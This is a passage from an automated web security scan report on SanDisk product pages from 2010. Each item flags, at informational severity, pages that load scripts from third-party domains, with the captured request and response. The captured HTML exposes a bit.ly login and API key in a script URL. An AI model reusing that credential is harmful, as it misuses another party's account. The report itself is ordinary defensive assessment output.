Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33098
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB*mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-008G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card ... and shoot more video on your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone room to capture the moment with a SanDisk 2GB* mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-002G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.170. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-microsdhc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mobile-memory-products/sandisk-microsdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk.. microSDHC... 32GB* mobile memory cards are a popular way to store your music, videos, photos, games, files and applications on cell phones with memory card slots.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-032G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card and shoot more video
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.171. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-microsdhc.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mobile-memory-products/sandisk-microsdhc.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33005
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk.. microSDHC... 32GB* mobile memory cards are a popular way to store your music, videos, photos, games, files and applications on cell phones with memory card slots.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-032G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card and shoot more video
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQ-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.172. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30020
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk.. 16GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk.. 8GB* mobile memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-8192-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk.. 4GB* mobile memory card...and shoot more video.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDQY-4096-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.173. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26257
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk MobileMate... Micro Reader
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-121-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.174. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/netbook-cards/sandisk-netbook-sdhc-memory-card

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/netbook-cards/sandisk-netbook-sdhc-memory-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Give your netbook the space it craves with 16GB SanDisk.. SDHC... memory card...and bring more videos, music and photos with you, wherever you go.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDNT-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">More videos, songs and applications, take them all with you on a 8GB SanDisk.. SDHC... memory card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDNT-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.175. http://www.sandisk.com/products/readers-accessories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/readers-accessories HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29556
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.176. http://www.sandisk.com/products/readers-accessories/large-memory-card-case  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/large-memory-card-case

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/readers-accessories/large-memory-card-case HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24183
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Large Memory Card Case
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDAC-13-G10&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.177. http://www.sandisk.com/products/readers-accessories/micromate-sdhc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/micromate-sdhc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/readers-accessories/micromate-sdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25258
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">MicroMate... SDHC
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-113-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.178. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-extreme-20-usb-readers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/readers-accessories/sandisk-extreme-20-usb-readers HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25799
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. 2.0 USB Readers
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDRX3-CF-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.179. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-extreme-firewire-reader

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/readers-accessories/sandisk-extreme-firewire-reader HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26487
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. FireWire Readers
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDRX4-CF-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.180. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-extreme-pro-expresscard-adapter

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/readers-accessories/sandisk-extreme-pro-expresscard-adapter HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29256
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. Pro... ExpressCard... Adapter
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDADX6-CF-G20&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.181. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
